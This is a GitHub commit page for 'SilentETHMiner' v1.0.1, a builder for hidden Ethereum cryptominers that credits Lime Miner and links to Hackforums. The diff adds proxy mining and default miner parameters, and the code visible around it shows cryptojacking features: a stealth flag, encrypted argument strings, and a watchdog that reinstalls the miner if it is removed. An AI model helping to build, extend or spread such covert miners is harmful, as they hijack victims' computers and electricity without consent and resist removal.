Skip to content
This repository has been archived by the owner on Sep 12, 2023. It is now read-only.

Commit

Permalink
Updated to v1.0.1
Browse files Browse the repository at this point in the history
* Added support for proxy mining
  • Loading branch information
UnamSanctam committed Mar 20, 2021
1 parent adf22cc commit ab27978
Show file tree
Hide file tree
Showing 4 changed files with 11 additions and 13 deletions.
4 changes: 3 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@

<img src="https://github.com/UnamSanctam/SilentETHMiner/blob/main/SilentETHMiner.png?raw=true">

# SilentETHMiner v1.0 - Based on Lime Miner v0.3
# SilentETHMiner v1.0.1 - Based on Lime Miner v0.3


## Main Features
Expand Down Expand Up @@ -39,6 +39,8 @@ So the requirements are as follow:

## Changes

# v1.0.1 (20/03/2021)
* Added support for proxy mining
# v1.0 (20/03/2021)
* Inital release

Expand Down
10 changes: 5 additions & 5 deletions SilentETHMiner/Form1.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

3 changes: 0 additions & 3 deletions SilentETHMiner/Form1.resx
Original file line number Diff line number Diff line change
Expand Up @@ -126,9 +126,6 @@
<metadata name="TooltipHelper.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>343, 17</value>
</metadata>
<data name="Label15.ToolTip" xml:space="preserve">
<value>If enabled the miner will use the normal "Max CPU" amount while the computer is in use and will start using the "Idle CPU" amount when no keyboard and mouse input has been detected for the "Idle Wait" amount of minutes.</value>
</data>
<data name="Label36.ToolTip" xml:space="preserve">
<value>Starts a separate program that monitors the miner to see if it's still running and located in the installed path. If it's not running or missing it will start and copy the miner back to the install location.</value>
</data>
Expand Down
7 changes: 3 additions & 4 deletions SilentETHMiner/Form1.vb
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ Imports System.Text

Public Class Form1
Public Shared rand As New Random()
Public advancedParams As String = ""
Public advancedParams As String = " --response-timeout=30 --farm-retries=30 "
Public watchdogdata As Byte() = New Byte() {}

'Silent ETH Miner by Unam Sanctam https://github.com/UnamSanctam/SilentETHMiner, based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner
Expand All @@ -20,7 +20,7 @@ Public Class Form1

Private Sub BackgroundWorker1_DoWork(sender As Object, e As System.ComponentModel.DoWorkEventArgs) Handles BackgroundWorker1.DoWork
Try
MephForm1.Text = "Silent ETH Miner Builder 1.0"
MephForm1.Text = "Silent ETH Miner Builder 1.0.1"
Catch ex As Exception
End Try

Expand Down Expand Up @@ -105,7 +105,6 @@ Public Class Form1
argstr += " --unam-stealth "
End If

MessageBox.Show(argstr)
minerbuilder.Replace("#ARGSTR", EncryptString(argstr))

If chkInstall.Checked Then
Expand Down Expand Up @@ -392,7 +391,7 @@ Public Class Form1
End Sub

Private Sub labelHackforums_LinkClicked(sender As Object, e As LinkLabelLinkClickedEventArgs) Handles labelHackforums.LinkClicked
Process.Start("https://hackforums.net/showthread.php?tid=5995773")
Process.Start("https://hackforums.net/showthread.php?tid=6145468")
End Sub

Private Sub chkAdvanced_CheckedChanged(sender As Object) Handles chkAdvanced.CheckedChanged
Expand Down

0 comments on commit ab27978

Please sign in to comment.